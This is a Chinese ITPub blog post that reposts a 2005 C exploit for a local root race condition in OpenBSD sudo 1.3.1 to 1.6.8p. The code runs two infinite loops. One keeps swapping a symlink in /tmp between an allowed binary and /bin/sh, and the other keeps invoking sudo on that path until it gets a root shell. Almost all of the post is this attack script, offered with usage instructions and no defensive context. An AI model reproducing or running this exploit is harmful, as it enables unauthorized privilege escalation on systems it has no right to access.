ITPub博客

首页 > Linux操作系统 > Linux操作系统 > OpenBSD sudo 1.3.1 - 1.6.8p local root exploit

OpenBSD sudo 1.3.1 - 1.6.8p local root exploit

原创 Linux操作系统 作者:coolwinds 时间:2005-07-07 23:43:56 0 删除 编辑

/*
ANY MODIFIED REPUBLISHING IS RESTRICTED
OpenBSD sudo 1.3.1 - 1.6.8p local root exploit
Tested under OpenBSD 3.6 sudo 1.6.7p5
Vuln by OpenBSD errata, http://www.openbsd.org/errata.html
(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru
Race condition in path name, can take a while to exploit
Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince
Fuck lamerz: Saint_I, nmalykh
All rights reserved.
ANY MODIFIED REPUBLISHING IS RESTRICTED
*/

[@more@]

#include
#include
#include
#include
#include

#define SUDO "/usr/bin/sudo"
#ifdef BUFSIZ
#undef BUFSIZ
#define BUFSIZ 128
#endif

int main (int argc, char ** argv)
{
pid_t pid;
void * buffer;
char * exec, * race, * path;
if(argc != 3)
{
fprintf(stderr, "r57sudo.c by __blfn");
fprintf(stderr, "RusH Security Teamn");
fprintf(stderr, "Usage: %s n", argv[0]);
fprintf(stderr, "e.g. ./r57sudo /bin/ls lsn");
return EX_USAGE;
}
pid = fork();
if(pid == 0)
{
while(1)
{
exec = (char *)calloc(BUFSIZ, sizeof(char));
race = (char *)calloc(BUFSIZ, sizeof(char));
bzero(exec, sizeof(exec));
snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]);
system((char *)exec);
bzero(race, sizeof(race));
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]);
system((char *)race);
bzero(race, sizeof(race));
snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]);
system((char *)race);
bzero(race, sizeof(race));
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]);
system((char *)race);
}
}
if(pid > 0)
{
while(1)
{
path = (char *)calloc(BUFSIZ/2, sizeof(char));
snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);
system((char *)path);
}
}
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-801810/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947459